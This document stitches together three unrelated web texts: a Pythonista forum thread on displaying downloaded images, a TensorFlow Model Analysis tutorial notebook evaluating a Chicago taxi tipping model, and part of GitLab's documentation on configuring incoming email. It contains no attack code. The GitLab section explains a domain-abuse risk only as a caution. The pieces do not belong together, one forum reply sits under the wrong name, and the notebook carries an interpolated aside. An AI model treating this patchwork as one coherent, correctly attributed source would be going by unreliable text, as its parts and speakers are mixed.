But for some reason what I did below doesn't do anything. Could someone tell me what I'm doing wrong?
import ui,requests,Image
from io import BytesIO
Image_url = "some image url"
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view = ui.ImageView()
Img_view.frame() = testview.frame()
testview.add_subview(img_view)
testview.present()
Img_view.image= ui.Image.from_data(image.tobytes())
AceNinjaFire
Nvm I think I figured it out, it has to be a bytes-like object. I just have to figure out how to get image.tobytes() to byte-like and not bytes
stephen
@AceNinjaFire said:
import ui,requests,Image
from io import BytesIO
Image_url = "some image url"
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view
why not use ui.ImageView.load_from_url(URL)
stephen
@AceNinjaFire
or better yet
import urllib.request, ui
URL = 'https://i.imgur.com/qaAHDac.png'
with urllib.request.urlopen(URL) as url:
with open('temp.jpg', 'wb') as f:
f.write(url.read())
iv=ui.ImageView(image=ui.Image.named('temp.jpg')).present('sheets')
ccc
import io, requests, ui
url = "https://www.python.org/static/community_logos/python-powered-w-200x80.png"
with io.BytesIO(requests.get(url).content) as image_data:
image = ui.Image.from_data(image_data.getvalue())
ui.ImageView(image=image).present()
If you are dealing with lots of images or large images in Pythonista then it is super important to use the with block to automate the close of the io.BytesIO and give the garbage collector the opportunity to reclaim the bytes and avoid out-of-memory crashes.
ccc
Shiiiiit sorry lol I had not realized that anyone had replied. I knew I could do that from the beginning, I was just trying to go from jpeg/image object straight to ui.Image/Ui.ImageView.
I ended up just making a list from each requests.get().content and using that.
I was just trying to swim up river to see if I could do it I guess lol.
Ah thank you lol, I got as far as image_data = BytesIO(requests.get().content)
I never thought about using the Context Manager and putting the .getvalue() on the image_data. Lol I appreciate the help!
AceNinjaFire
stephen
no problem, and don't forget that ui.Image.from_data() has two arguments: data and scale.
The second (optional) is for Retina scaling, 2:1 or 3:1, usually 2:1, and you would pass 2 for scale: ui.Image.from_data(image_data.getvalue(), 2)
|
An Example of a Key Component of TensorFlow Extended (TFX)
TensorFlow Model Analysis (TFMA) is a library for performing model evaluation across different slices of data. TFMA performs its computations in a distributed manner over large amounts of data using Apache Beam.
This example colab notebook illustrates how TFMA can be used to investigate and visualize the performance of a model with respect to characteristics of the dataset. We'll use a model that we trained previously, and now you get to play with the results! The model we trained was for the Chicago Taxi Example, which uses the Taxi Trips dataset released by the City of Chicago. Explore the full dataset in the BigQuery UI.
As a modeler and developer, think about how this data is used and the potential benefits and harm a model's predictions can cause. A model like this could reinforce societal biases and disparities. Is a feature relevant to the problem you want to solve, or will it introduce bias? For more information, read about ML fairness.
The columns in the dataset are:
pickup_community_area, fare, trip_start_month
trip_start_hour, trip_start_day, trip_start_timestamp
pickup_latitude, pickup_longitude, dropoff_latitude
dropoff_longitude, trip_miles, pickup_census_tract
dropoff_census_tract, payment_type, company
trip_seconds, dropoff_community_area, tips
Install Jupyter Extensions
jupyter nbextension enable --py widgetsnbextension --sys-prefix
jupyter nbextension install --py --symlink tensorflow_model_analysis --sys-prefix
jupyter nbextension enable --py tensorflow_model_analysis --sys-prefix
Install TensorFlow Model Analysis (TFMA)
This will pull in all the dependencies, and will take a minute.
Note that to make sure all dependencies are installed correctly, you may need to rerun this install step several times before there are no errors.
# This setup was tested with TF 2.3 and TFMA 0.24 (using colab), but it should
# also work with the latest release.
import sys
# Confirm that we're using Python 3
assert sys.version_info.major==3, 'This notebook must be run using Python 3.'
print('Installing TensorFlow')
import tensorflow as tf
print('TF version: {}'.format(tf.__version__))
print('Installing Tensorflow Model Analysis and Dependencies')
!pip install -q tensorflow_model_analysis
import apache_beam as beam
print('Beam version: {}'.format(beam.__version__))
import tensorflow_model_analysis as tfma
print('TFMA version: {}'.format(tfma.__version__))
Installing TensorFlow
TF version: 2.3.1
Installing Tensorflow Model Analysis and Dependencies
ERROR: After October 2020 you may experience errors when installing or updating packages. This is because pip will change the way that it resolves dependency conflicts. We recommend you use --use-feature=2020-resolver to test your packages with the new resolver before it becomes the default.
google-api-python-client 1.12.3 requires httplib2<1dev,>=0.15.0, but you'll have httplib2 0.9.2 which is incompatible.
Beam version: 2.24.0
TFMA version: 0.24.3
Load The Files
We'll download a tar file that has everything we need. That includes:
Training and evaluation datasets
Data schema
Training and serving saved models (keras and estimator) and eval saved models (estimator)
# Download the tar file from GCP and extract it
import io, os, tempfile
TAR_NAME = 'saved_models-2.2'
BASE_DIR = tempfile.mkdtemp()
DATA_DIR = os.path.join(BASE_DIR, TAR_NAME, 'data')
MODELS_DIR = os.path.join(BASE_DIR, TAR_NAME, 'models')
SCHEMA = os.path.join(BASE_DIR, TAR_NAME, 'schema.pbtxt')
OUTPUT_DIR = os.path.join(BASE_DIR, 'output')
!curl -O https://storage.googleapis.com/artifacts.tfx-oss-public.appspot.com/datasets/{TAR_NAME}.tar
!tar xf {TAR_NAME}.tar
!mv {TAR_NAME} {BASE_DIR}
!rm {TAR_NAME}.tar
print("Here's what we downloaded:")
!ls -R {BASE_DIR}
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 6800k 100 6800k 0 0 25.4M 0 --:--:-- --:--:-- --:--:-- 25.3M Here's what we downloaded: /tmp/tmpj6t03cp6: saved_models-2.2 /tmp/tmpj6t03cp6/saved_models-2.2: data models schema.pbtxt /tmp/tmpj6t03cp6/saved_models-2.2/data: eval train /tmp/tmpj6t03cp6/saved_models-2.2/data/eval: data.csv /tmp/tmpj6t03cp6/saved_models-2.2/data/train: data.csv /tmp/tmpj6t03cp6/saved_models-2.2/models: estimator keras /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator: eval_model_dir serving_model_dir /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir: 1591221811 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811: saved_model.pb tmp.pbtxt variables /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir: checkpoint eval_chicago-taxi-eval events.out.tfevents.1591221780.my-pipeline-b57vp-237544850 export graph.pbtxt model.ckpt-100.data-00000-of-00001 model.ckpt-100.index model.ckpt-100.meta /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/eval_chicago-taxi-eval: events.out.tfevents.1591221799.my-pipeline-b57vp-237544850 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export: chicago-taxi /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi: 1591221801 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi/1591221801: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi/1591221801/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras: 0 1 2 /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/0: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/0/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/1: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/1/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/2: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/2/variables: variables.data-00000-of-00001 variables.index
Parse the Schema
Among the things we downloaded was a schema for our data that was created by TensorFlow Data Validation. Let's parse that now so that we can use it with TFMA.
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.python.lib.io import file_io
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow.core.example import example_pb2
schema = schema_pb2.Schema()
contents = file_io.read_file_to_string(SCHEMA)
schema = text_format.Parse(contents, schema)
Use the Schema to Create TFRecords
We need to give TFMA access to our dataset, so let's create a TFRecords file. We can use our schema to create it, since it gives us the correct type for each feature.
import csv
datafile = os.path.join(DATA_DIR, 'eval', 'data.csv')
reader = csv.DictReader(open(datafile, 'r'))
examples = []
for line in reader:
example = example_pb2.Example()
for feature in schema.feature:
key = feature.name
if feature.type == schema_pb2.FLOAT:
example.features.feature[key].float_list.value[:] = (
[float(line[key])] if len(line[key]) > 0 else [])
elif feature.type == schema_pb2.INT:
example.features.feature[key].int64_list.value[:] = (
[int(line[key])] if len(line[key]) > 0 else [])
elif feature.type == schema_pb2.BYTES:
example.features.feature[key].bytes_list.value[:] = (
[line[key].encode('utf8')] if len(line[key]) > 0 else [])
# Add a new column 'big_tipper' that indicates if tips was > 20% of the fare.
# TODO(b/157064428): Remove after label transformation is supported for Keras.
big_tipper = float(line['tips']) > float(line['fare']) * 0.2
example.features.feature['big_tipper'].float_list.value[:] = [big_tipper]
examples.append(example)
tfrecord_file = os.path.join(BASE_DIR, 'train_data.rio')
with tf.io.TFRecordWriter(tfrecord_file) as writer:
for example in examples:
writer.write(example.SerializeToString())
!ls {tfrecord_file}
/tmp/tmpj6t03cp6/train_data.rio
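To sanity-check the file we just wrote, the records can be read back with tf.data (a quick verification sketch, not part of the original notebook):
dataset = tf.data.TFRecordDataset(tfrecord_file)
for raw_record in dataset.take(1):
    parsed = example_pb2.Example.FromString(raw_record.numpy())
    print(parsed)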
Setup and Run TFMA
TFMA supports a number of different model types, including TF keras models, models based on generic TF2 signature APIs, as well as TF estimator based models. The get_started guide has the full list of supported model types and any restrictions. For this example we are going to show how to configure a keras based model as well as an estimator based model that was saved as an EvalSavedModel. See the FAQ for examples of other configurations.
TFMA provides support for calculating metrics that were used at training time (i.e. built-in metrics) as well as metrics defined after the model was saved as part of the TFMA configuration settings. For our keras setup we will demonstrate adding our metrics and plots manually as part of the configuration (see the metrics guide for information on the metrics and plots that are supported). For the estimator setup we will use the built-in metrics that were saved with the model. Our setups also include a number of slicing specs, which are discussed in more detail in the following sections.
After creating a tfma.EvalConfig and tfma.EvalSharedModel, we can then run TFMA using tfma.run_model_analysis. This will create a tfma.EvalResult, which we can use later for rendering our metrics and plots.
Keras
import tensorflow_model_analysis as tfma
# Setup tfma.EvalConfig settings
keras_eval_config = text_format.Parse("""
## Model information
model_specs {
# For keras (and serving models) we need to add a `label_key`.
label_key: "big_tipper"
}
## Post training metric information. These will be merged with any built-in
## metrics from training.
metrics_specs {
metrics { class_name: "ExampleCount" }
metrics { class_name: "BinaryAccuracy" }
metrics { class_name: "BinaryCrossentropy" }
metrics { class_name: "AUC" }
metrics { class_name: "AUCPrecisionRecall" }
metrics { class_name: "Precision" }
metrics { class_name: "Recall" }
metrics { class_name: "MeanLabel" }
metrics { class_name: "MeanPrediction" }
metrics { class_name: "Calibration" }
metrics { class_name: "CalibrationPlot" }
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_values: {
key: "trip_start_month"
value: "1"
}
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create a tfma.EvalSharedModel that points at our keras model.
keras_model_path = os.path.join(MODELS_DIR, 'keras', '2')
keras_eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=keras_model_path,
eval_config=keras_eval_config)
keras_output_path = os.path.join(OUTPUT_DIR, 'keras')
# Run TFMA
keras_eval_result = tfma.run_model_analysis(
eval_shared_model=keras_eval_shared_model,
eval_config=keras_eval_config,
data_location=tfrecord_file,
output_path=keras_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta WARNING:apache_beam.runners.interactive.interactive_environment:Dependencies required for Interactive Beam PCollection visualization are not available, please use: `pip install apache-beam[interactive]` to install necessary dependencies to enable all data visualization features. Warning:apache_beam.io.tfrecordio:Couldn't find python-snappy so the implementation of _TFRecordUtil._masked_crc32c is not as fast as it could be. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/writers/metrics_plots_and_validations_writer.py:70: tf_record_iterator (from tensorflow.python.lib.io.tf_record) is deprecated and will be removed in a future version. Instructions for updating: Use eager execution and: `tf.data.TFRecordDataset(path)` Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/writers/metrics_plots_and_validations_writer.py:70: tf_record_iterator (from tensorflow.python.lib.io.tf_record) is deprecated and will be removed in a future version. Instructions for updating: Use eager execution and: `tf.data.TFRecordDataset(path)`
Estimator
import tensorflow_model_analysis as tfma
# Setup tfma.EvalConfig settings
estimator_eval_config = text_format.Parse("""
## Model information
model_specs {
# To use EvalSavedModel set `signature_name` to "eval".
signature_name: "eval"
}
## Post training metric information. These will be merged with any built-in
## metrics from training.
metrics_specs {
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_values: {
key: "trip_start_month"
value: "1"
}
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create a tfma.EvalSharedModel that points at our eval saved model.
estimator_base_model_path = os.path.join(
MODELS_DIR, 'estimator', 'eval_model_dir')
estimator_model_path = os.path.join(
estimator_base_model_path, os.listdir(estimator_base_model_path)[0])
estimator_eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=estimator_model_path,
eval_config=estimator_eval_config)
estimator_output_path = os.path.join(OUTPUT_DIR, 'estimator')
# Run TFMA
estimator_eval_result = tfma.run_model_analysis(
eval_shared_model=estimator_eval_shared_model,
eval_config=estimator_eval_config,
data_location=tfrecord_file,
output_path=estimator_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/load.py:169: load (from tensorflow.python.saved_model.loader_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.loader.load or tf.compat.v1.saved_model.load. There will be a new function for importing SavedModels in Tensorflow 2.0. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/load.py:169: load (from tensorflow.python.saved_model.loader_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.loader.load or tf.compat.v1.saved_model.load. There will be a new function for importing SavedModels in Tensorflow 2.0. INFO:tensorflow:Restoring parameters from /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables/variables INFO:tensorflow:Restoring parameters from /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables/variables Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/graph_ref.py:189: get_tensor_from_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.get_tensor_from_tensor_info or tf.compat.v1.saved_model.get_tensor_from_tensor_info. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/eval_saved_model/graph_ref.py:189: get_tensor_from_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version. Instructions for updating: This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.get_tensor_from_tensor_info or tf.compat.v1.saved_model.get_tensor_from_tensor_info.
Visualizing Metrics and Plots
Now that we've run the evaluation, let's take a look at our visualizations using TFMA. For the following examples we will visualize the results from running the evaluation on the keras model. To view the estimator based model, update eval_result to point at our estimator_eval_result variable.
eval_result = keras_eval_result
# eval_result = estimator_eval_result
Rendering Metrics
To view metrics, use tfma.view.render_slicing_metrics
By default the views will display the Overall slice. To view a particular slice you can either use the name of the column (by setting slicing_column) or provide a tfma.SlicingSpec.
The metrics visualization supports the following interactions:
Click and drag to pan
Scroll to zoom
Right click to reset the view
Hover over the desired data point to see more details
Select from four different types of views using the selections at the bottom
For example, we'll set slicing_column to look at the trip_start_hour feature from our previous slicing_specs.
tfma.view.render_slicing_metrics(eval_result, slicing_column='trip_start_hour')
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_hour:2', …
Slices Overview
The default visualization is the Slices Overview when the number of slices is small. It shows the values of metrics for each slice. Since we selected trip_start_hour above, it's showing us metrics like accuracy and AUC for each hour, which allows us to look for issues that are specific to some hours and not others.
In the visualization above:
Try sorting the feature column, which is our trip_start_hour feature, by clicking on the column header
Try sorting by precision, and notice that the precision for some of the hours with examples is 0, which may indicate a problem
The chart also allows us to select and display different metrics in our slices.
Try selecting different metrics from the "Show" menu
Try selecting recall in the "Show" menu, and notice that the recall for some of the hours with examples is 0, which may indicate a problem
It is also possible to set a threshold to filter out slices with smaller numbers of examples, or "weights". You can type a minimum number of examples, or use the slider.
Metrics Histogram
This view also supports a Metrics Histogram as an alternative visualization, which is also the default view when the number of slices is large. The results will be divided into buckets, and the number of slices / total weights / both can be visualized. Columns can be sorted by clicking on the column header. Slices with small weights can be filtered out by setting the threshold. Further filtering can be applied by dragging the grey band. To reset the range, double click the band. Filtering can also be used to remove outliers in the visualization and the metrics tables. Click the gear icon to switch to a logarithmic scale instead of a linear scale.
Try selecting "Metrics Histogram" in the Visualization menu
More Slices
Our initial tfma.EvalConfig created a whole list of slicing_specs, which we can visualize by updating the slice information passed to tfma.view.render_slicing_metrics. Here we'll select the trip_start_day slice (days of the week). Try changing trip_start_day to trip_start_month and rendering again to examine different slices.
tfma.view.render_slicing_metrics(eval_result, slicing_column='trip_start_day')
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day:3', '…
TFMA also supports creating feature crosses to analyze combinations of features. Our original settings created a cross between trip_start_hour and trip_start_day:
tfma.view.render_slicing_metrics(
eval_result,
slicing_spec=tfma.SlicingSpec(
feature_keys=['trip_start_hour', 'trip_start_day']))
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day_X_tri…
Crossing the two columns creates a lot of combinations! Let's narrow down our cross to only look at trips that start at noon. Then let's select binary_accuracy from the visualization:
tfma.view.render_slicing_metrics(
eval_result,
slicing_spec=tfma.SlicingSpec(
feature_keys=['trip_start_day'], feature_values={'trip_start_hour': '12'}))
SlicingMetricsViewer(config={'weightedExamplesColumn': 'example_count'}, data=[{'slice': 'trip_start_day_X_tri…
Rendering Plots
As with metrics, plots can be viewed by slice. Unlike metrics, only plots for a particular slice value can be displayed, so the tfma.SlicingSpec must be used and it must specify both a slice feature name and value. If no slice is provided then the plots for the Overall slice are used.
In the example below we display the CalibrationPlot and ConfusionMatrixPlot plots that were computed for the trip_start_hour:1 slice.
tfma.view.render_plot(
eval_result,
tfma.SlicingSpec(feature_values={'trip_start_hour': '1'}))
PlotViewer(config={'sliceName': 'trip_start_hour:1', 'metricKeys': {'calibrationPlot': {'metricName': 'calibra…
Tracking Model Performance Over Time
Your training dataset will be used for training your model, and will hopefully be representative of your test dataset and the data that will be sent to your model in production. However, while the data in inference requests may remain the same as your training data, in many cases it will start to change enough so that the performance of your model will change.
That means that you need to monitor and measure your model's performance on an ongoing basis, so that you can be aware of changes and react to them. Let's take a look at how TFMA can help.
Let's load 3 different model runs and use TFMA to see how they compare using render_time_series.
# Note this re-uses the EvalConfig from the keras setup.
# Run eval on each saved model
output_paths = []
for i in range(3):
    # Create a tfma.EvalSharedModel that points at our saved model.
    eval_shared_model = tfma.default_eval_shared_model(
        eval_saved_model_path=os.path.join(MODELS_DIR, 'keras', str(i)),
        eval_config=keras_eval_config)
    output_path = os.path.join(OUTPUT_DIR, 'time_series', str(i))
    output_paths.append(output_path)
    # Run TFMA
    tfma.run_model_analysis(eval_shared_model=eval_shared_model,
                            eval_config=keras_eval_config,
                            data_location=tfrecord_file,
                            output_path=output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta
First, we'll imagine that we trained and deployed our model yesterday, and now we want to see how it's doing on the new data coming in today. The visualization will start by displaying AUC. From the UI you can:
Add other metrics using the "Add metric series" menu.
Close unwanted graphs by clicking the x
Hover over data points (the ends of line segments in the graph) to get more details
eval_results_from_disk = tfma.load_eval_results(output_paths[:2])
tfma.view.render_time_series(eval_results_from_disk)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration': {'doubleValue': …
Now we'll imagine that another day has passed and we want to see how the models are doing on the new data coming in today, compared to the previous two days:
eval_results_from_disk = tfma.load_eval_results(output_paths)
tfma.view.render_time_series(eval_results_from_disk)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration': {'doubleValue': …
Model validation
TFMA can be configured to evaluate multiple models at the same time. Typically this is done to compare a new model against a baseline (such as the currently serving model) to determine what the performance differences in metrics (e.g. AUC, etc) are relative to the baseline. When thresholds are configured, TFMA will produce a tfma.ValidationResult record indicating whether the performance matches expectations.
Let's re-configure our keras evaluation to compare two models: a candidate and a baseline. We will also validate the candidate's performance against the baseline by setting a tfma.MetricThreshold on the AUC metric.
# Setup tfma.EvalConfig setting
eval_config_with_thresholds = text_format.Parse("""
## Model information
model_specs {
name: "candidate"
# For keras we need to add a `label_key`.
label_key: "big_tipper"
}
model_specs {
name: "baseline"
# For keras we need to add a `label_key`.
label_key: "big_tipper"
is_baseline: true
}
## Post training metric information
metrics_specs {
metrics { class_name: "ExampleCount" }
metrics { class_name: "BinaryAccuracy" }
metrics { class_name: "BinaryCrossentropy" }
metrics {
class_name: "AUC"
threshold {
# Ensure that AUC is always > 0.9
value_threshold {
lower_bound { value: 0.9 }
}
# Ensure that AUC does not drop by more than a small epsilon
# e.g. (candidate - baseline) > -1e-10 or candidate > baseline - 1e-10
change_threshold {
direction: HIGHER_IS_BETTER
absolute { value: -1e-10 }
}
}
}
metrics { class_name: "AUCPrecisionRecall" }
metrics { class_name: "Precision" }
metrics { class_name: "Recall" }
metrics { class_name: "MeanLabel" }
metrics { class_name: "MeanPrediction" }
metrics { class_name: "Calibration" }
metrics { class_name: "CalibrationPlot" }
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_keys: ["trip_start_month"]
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create tfma.EvalSharedModels that point at our keras models.
candidate_model_path = os.path.join(MODELS_DIR, 'keras', '2')
baseline_model_path = os.path.join(MODELS_DIR, 'keras', '1')
eval_shared_models = [
tfma.default_eval_shared_model(
model_name=tfma.CANDIDATE_KEY,
eval_saved_model_path=candidate_model_path,
eval_config=eval_config_with_thresholds),
tfma.default_eval_shared_model(
model_name=tfma.BASELINE_KEY,
eval_saved_model_path=baseline_model_path,
eval_config=eval_config_with_thresholds),
]
validation_output_path = os.path.join(OUTPUT_DIR, 'validation')
# Run TFMA
eval_result_with_validation = tfma.run_model_analysis(
eval_shared_models,
eval_config=eval_config_with_thresholds,
data_location=tfrecord_file,
output_path=validation_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta
/tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/evaluators/metrics_validator.py:66: RuntimeWarning: invalid value encountered in true_divide
  ratio = diff / metrics[key.make_baseline_key(baseline_model_name)]
When evaluations are run with one or more models against a baseline, TFMA automatically adds diff metrics for all of the metrics computed during the evaluation. These metrics are named after the corresponding metric, but with _diff appended to the metric name.
Let's take a look at the metrics produced by our run:
tfma.view.render_time_series(eval_result_with_validation)
TimeSeriesViewer(config={'isModelCentric': True}, data=[{'metrics': {'': {'': {'calibration_diff': {'doubleVal…
Now let's look at the output from our validation checks. To view the validation results we use tfma.load_validation_result. For our example, the validation fails because AUC is below the threshold.
validation_result = tfma.load_validation_result(validation_output_path)
print(validation_result.validation_ok)
False
|
Requirements
Set it up
GitLab has several features based on receiving incoming emails:
Reply by Email: allow GitLab users to comment on issues and merge requests by replying to notification emails.
New issue by email: allow GitLab users to create a new issue by sending an email to a user-specific email address.
New merge request by email: allow GitLab users to create a new merge request by sending an email to a user-specific email address.
Service Desk: provide e-mail support to your customers through GitLab.
Note: It is not recommended to use an email address that receives or will receive any messages not intended for the GitLab instance. Any incoming emails not intended for GitLab will receive a reject notice.
Handling incoming emails requires an IMAP-enabled email account. GitLab requires one of the following three strategies:
Email sub-addressing (recommended)
Catch-all mailbox
Dedicated email address (supports Reply by Email only)
Let’s walk through each of these options.
Sub-addressing is a mail server feature where any email to user+arbitrary_tag@example.com will end up in the mailbox for user@example.com. It is supported by providers such as Gmail, Google Apps, Yahoo! Mail, Outlook.com, and iCloud, as well as the Postfix mail server, which you can run on-premises. Microsoft Exchange Server does not support sub-addressing, and Microsoft Office 365 does not support sub-addressing by default.
Tip: If your provider or server supports email sub-addressing, we recommend using it. A dedicated email address only supports Reply by Email functionality. A catch-all mailbox supports the same features as sub-addressing as of GitLab 11.7, but sub-addressing is still preferred because only one email address is used, leaving a catch-all available for other purposes beyond GitLab.
A catch-all mailbox for a domain receives all emails addressed to the domain that do not match any addresses that exist on the mail server.
As of GitLab 11.7, catch-all mailboxes support the same features as email sub-addressing, but email sub-addressing remains our recommendation so that you can reserve your catch-all mailbox for other purposes.
This solution is relatively simple to set up: you just need to create an email address dedicated to receive your users’ replies to GitLab notifications. However, this method only supports replies, and not the other features of incoming email.
If you want to use Gmail / Google Apps for incoming emails, make sure you have IMAP access enabled and either allow less secure apps to access the account, or turn on 2-step verification and use an application password.
If you want to use Office 365, and two-factor authentication is enabled, make sure you’re using an app password instead of the regular password for the mailbox.
To set up a basic Postfix mail server with IMAP access on Ubuntu, follow the Postfix setup documentation.
Caution: Be careful when choosing the domain used for receiving incoming email.
For example, suppose your top-level company domain is hooli.com. All employees in your company have an email address at that domain via Google Apps, and your company's private Slack instance requires a valid @hooli.com email address to sign up.
If you also host a public-facing GitLab instance at hooli.com and set your incoming email domain to hooli.com, an attacker could abuse the "Create new issue by email" or "Create new merge request by email" features by using a project's unique address as the email when signing up for Slack. This would send a confirmation email, which would create a new issue or merge request on the project owned by the attacker, allowing them to click the confirmation link and validate their account on your company's private Slack instance.
We recommend receiving incoming email on a subdomain, such as incoming.hooli.com, and ensuring that you do not employ any services that authenticate solely based on access to an email domain such as *.hooli.com. Alternatively, use a dedicated domain for GitLab email communications such as hooli-gitlab.com.
See GitLab issue #30366 for a real-world example of this exploit.
Caution: Use a mail server that has been configured to reduce spam. A Postfix mail server that is running on a default configuration, for example, can result in abuse. All messages received on the configured mailbox will be processed, and messages that are not intended for the GitLab instance will receive a reject notice. If the sender's address is spoofed, the reject notice will be delivered to the spoofed FROM address, which can cause the mail server's IP or domain to appear on a blocklist.
Find the incoming_email section in /etc/gitlab/gitlab.rb, enable the feature and fill in the details for your specific IMAP server and email account (see examples below).
Reconfigure GitLab for the changes to take effect:
sudo gitlab-ctl reconfigure
sudo gitlab-ctl restart
Verify that everything is configured correctly:
sudo gitlab-rake gitlab:incoming_email:check
Reply by email should now be working.
Go to the GitLab installation directory:
cd /home/git/gitlab
Find the incoming_email section in config/gitlab.yml, enable the feature and fill in the details for your specific IMAP server and email account (see examples below).
Enable mail_room in the init script at /etc/default/gitlab:
sudo mkdir -p /etc/default
echo 'mail_room_enabled=true' | sudo tee -a /etc/default/gitlab
Restart GitLab:
sudo service gitlab restart
Verify that everything is configured correctly:
sudo -u git -H bundle exec rake gitlab:incoming_email:check RAILS_ENV=production
Reply by email should now be working.
Example configuration for Postfix mail server. Assumes mailbox incoming@gitlab.example.com.
Example for Omnibus installs:
gitlab_rails['incoming_email_enabled'] = true # The email address including the `%{key}` placeholder that will be replaced to reference the item being replied to. # The placeholder can be omitted but if present, it must appear in the "user" part of the address (before the `@`). gitlab_rails['incoming_email_address'] = "incoming+%{key}@gitlab.example.com" # Email account username # With third party providers, this is usually the full email address. # With self-hosted email servers, this is usually the user part of the email address. gitlab_rails['incoming_email_email'] = "incoming" # Email account password gitlab_rails['incoming_email_password'] = "[REDACTED]" # IMAP server host gitlab_rails['incoming_email_host'] = "gitlab.example.com" # IMAP server port gitlab_rails['incoming_email_port'] = 143 # Whether the IMAP server uses SSL gitlab_rails['incoming_email_ssl'] = false # Whether the IMAP server uses StartTLS gitlab_rails['incoming_email_start_tls'] = false # The mailbox where incoming mail will end up. Usually "inbox". gitlab_rails['incoming_email_mailbox_name'] = "inbox" # The IDLE command timeout. gitlab_rails['incoming_email_idle_timeout'] = 60 # Whether to expunge (permanently remove) messages from the mailbox when they are deleted after delivery gitlab_rails['incoming_email_expunge_deleted'] = true
Example for source installs:
